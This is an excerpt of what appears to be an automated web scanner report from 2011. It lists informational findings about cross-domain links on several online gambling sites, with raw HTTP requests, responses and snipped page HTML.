<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/5FreePromotion_ENG_GBP.jpg" /></a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_midle_right.jpg" /></a>
...[SNIP]...
<a href="InviteFriend.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_left.jpg" /></a>
...[SNIP]...
<a href="PlayersClub.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Promotions/promotion_bottom_right.jpg" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.36. http://www.info.crazyscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Responsible.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/Responsible.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gambleaware.co.uk/
http://www.gamblersanonymous.com/
http://www.gamblersanonymous.org/
http://www.gamblingtherapy.org/?ReferrerID=311
http://www.igcouncil.org/aboutus_readmore.php?id=251
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Responsible.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:52 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br />

<a class="ContentLinks" href="http://www.gamblingtherapy.org/?ReferrerID=311" target="_blank">
Gambling Therapy Helpline
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.gamblersanonymous.com" target="_blank">
Gamblers Anonymous
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.igcouncil.org/aboutus_readmore.php?id=251" target="_blank">
Helping Hand/IGC
</a>
...[SNIP]...
<br />
<a class="ContentLinks" href="http://www.gambleaware.co.uk/" target="_blank">
Gambleaware (UK)
</a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.37. http://www.info.crazyscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Terms.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/Terms.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /Terms.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:38 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 117962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.38. http://www.info.crazyscratch.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/UnderAge.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf
http://www.crazyrewards.com/
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

GET /UnderAge.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:09 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
| <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company...s registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.39. https://www.interwetten.com/en/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/default.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://www.interwetten.com/en/default.aspx?home=1

The response contains the following links to other domains:

https://intrwetten.hs.llnwd.net/e1/images/14548.jpg
https://intrwetten.hs.llnwd.net/e1/images/21186.jpg
https://intrwetten.hs.llnwd.net/e1/images/23270.jpg
https://intrwetten.hs.llnwd.net/e1/images/23271.jpg
https://intrwetten.hs.llnwd.net/e1/images/23276.jpg
https://intrwetten.hs.llnwd.net/e1/images/23278.jpg
https://intrwetten.hs.llnwd.net/e1/images/23281.jpg
https://intrwetten.hs.llnwd.net/e1/images/25446.jpg
https://intrwetten.hs.llnwd.net/e1/images/26744.jpg
https://intrwetten.hs.llnwd.net/e1/images/26754.jpg
https://www.thawte.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:39:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:39:59 GMT
Content-Length: 34108
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<div class="content">

<img src="https://intrwetten.hs.llnwd.net/e1/images/26744.jpg" id="SplashPanel1_ContentRepeater_ctl00_ctl00_ctl02_ImagePlain" onclick="document.location ='/games/default.aspx';" style="cursor:pointer;" />

<h3>
...[SNIP]...
<div class="content">

<img src="https://intrwetten.hs.llnwd.net/e1/images/25446.jpg" id="SplashPanel1_ContentRepeater_ctl01_ctl00_ctl02_ImagePlain" onclick="document.location ='/sportsbook/registrationform.aspx';" style="cursor:pointer;" />

<p>
...[SNIP]...
<div class="content">

<img src="https://intrwetten.hs.llnwd.net/e1/images/14548.jpg" id="SplashPanel1_ContentRepeater_ctl02_ctl00_ctl02_ImagePlain" onclick="document.location ='/SportsBook/Default.aspx';" style="cursor:pointer;" />

<p>
...[SNIP]...
<div class="content">

<img src="https://intrwetten.hs.llnwd.net/e1/images/21186.jpg" id="SplashPanel1_ContentRepeater_ctl03_ctl00_ctl02_ImagePlain" onclick="document.location ='/Casino/Content.aspx?ln=Promotions&tid=&cat=50FreeSpins&st=Casino';" style="cursor:pointer;" />

<p>
...[SNIP]...
<div class="content">

<img src="https://intrwetten.hs.llnwd.net/e1/images/26754.jpg" id="SplashPanel1_ContentRepeater_ctl04_ctl00_ctl02_ImagePlain" onclick="document.location ='/scratch/default.aspx';" style="cursor:pointer;" />

<p>
...[SNIP]...
<li style="width:210px;height:160px;">

<img src="https://intrwetten.hs.llnwd.net/e1/images/23270.jpg" id="PanelRotator1_rptItems_ctl00_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup('/Casino/game.aspx?CasinoId=1&GroupID=4&GameID=mpblackjack', '', 1020, 600, 1, 1, 0);" style="cursor:pointer;" />

</li>
...[SNIP]...
<li style="width:210px;height:160px;">

<img src="https://intrwetten.hs.llnwd.net/e1/images/23271.jpg" id="PanelRotator1_rptItems_ctl01_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup('/Casino/game.aspx?CasinoId=1&GroupID=10&GameID=eldorado', '', 1020, 600, 1, 1, 0);" style="cursor:pointer;" />

</li>
...[SNIP]...
<li style="width:210px;height:160px;">

<img src="https://intrwetten.hs.llnwd.net/e1/images/23276.jpg" id="PanelRotator1_rptItems_ctl02_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup('/Casino/Game.aspx?casinoId=2&gameId=495&groupId=13&StartGameName=LOTRthefellowship&GameName=Lord%20of%20The%20Rings', '', 1020, 600, 1, 1, 0);document.location ='/Casino/Default.aspx';" style="cursor:pointer;" />

</li>
...[SNIP]...
<li style="width:210px;height:160px;">

<img src="https://intrwetten.hs.llnwd.net/e1/images/23278.jpg" id="PanelRotator1_rptItems_ctl03_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup('/Casino/Game.aspx?CasinoId=2&GroupID=13&GameID=217&StartGameName=RubyPremierRoulette&GameName=Premier%20Roulette', '', 1020, 600, 1, 1, 0);document.location ='/Casino/Default.aspx';" style="cursor:pointer;" />

</li>
...[SNIP]...
<li style="width:210px;height:160px;">

<img src="https://intrwetten.hs.llnwd.net/e1/images/23281.jpg" id="PanelRotator1_rptItems_ctl04_ctl00_ctl01_ImagePlain" onclick="Global.OpenPopup('/Casino/game.aspx?CasinoId=1&GroupID=10&GameID=secretcode', '', 1020, 600, 1, 1, 0);" style="cursor:pointer;" />

</li>
...[SNIP]...
</a>
<a class="sbadgeThawte" href="https://www.thawte.com/" onclick="Global.OpenPopup('https://www.thawte.com/', 'Security', 755, 510, true, true, true, true);return false;"></a>
...[SNIP]...

18.40. http://www.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.karamba.com/Home.aspx?LanguageCode=ENG

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_bl.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_br.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tl.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tr.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/Karamba/Website/General/footerBottom.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/footerUpper.gif
http://download.neogames-tech.com/Brands/Karamba/Website/General/login_lang_separator_line.jpg
http://download.neogames-tech.com/Brands/Karamba/Website/Home/ContactUs_ENG.gif
http://download.neogames-tech.com/Brands/Karamba/Website/Home/Games_ENG.jpg
http://download.neogames-tech.com/Brands/Karamba/Website/Home/LatestWinners_ENG.gif
http://download.neogames-tech.com/Brands/Karamba/Website/Home/WinnersQuotes_ENG.gif
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en
https://www.aspireaffiliates.com/?CMI=1

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:01 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/Karamba/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/Karamba/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="ContactUsPopUp('ContactUsMail','',870,660);" href="#" title="Karamba.com online slots support"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/ContactUs_ENG.gif" border="0" alt="Karamba.com online slots support" /></a>
...[SNIP]...
<td style="padding-left: 10px; padding-right: 3px"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/login_lang_separator_line.jpg" border="0" /></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Karamba/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="TopMenuItem"><a href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/WinnersQuotes_ENG.gif" border="0" alt="Try your luck with free online slots" /></td>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/Games_ENG.jpg" border="0" alt="No download with free Online casino slots" /></td>
...[SNIP]...
<td><img src="http://download.neogames-tech.com/Brands/Karamba/Website/Home/LatestWinners_ENG.gif" border="0" alt="Big slots and games winners" /></td>
...[SNIP]...
</a>
|
<a href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<div class="BottomImageMap">
<img id="ctl00_cphFooter_objPageFooter_footerUpperStripImageMap" src="http://download.neogames-tech.com/Brands/Karamba/Website/General/footerUpper.gif" style="border-width:0px;" />
<img id="ctl00_cphFooter_objPageFooter_footerBottomStripImageMap" src="http://download.neogames-tech.com/Brands/Karamba/Website/General/footerBottom.gif" usemap="#ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap" style="border-width:0px;" /><map name="ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap" id="ImageMapctl00_cphFooter_objPageFooter_footerBottomStripImageMap">
...[SNIP]...
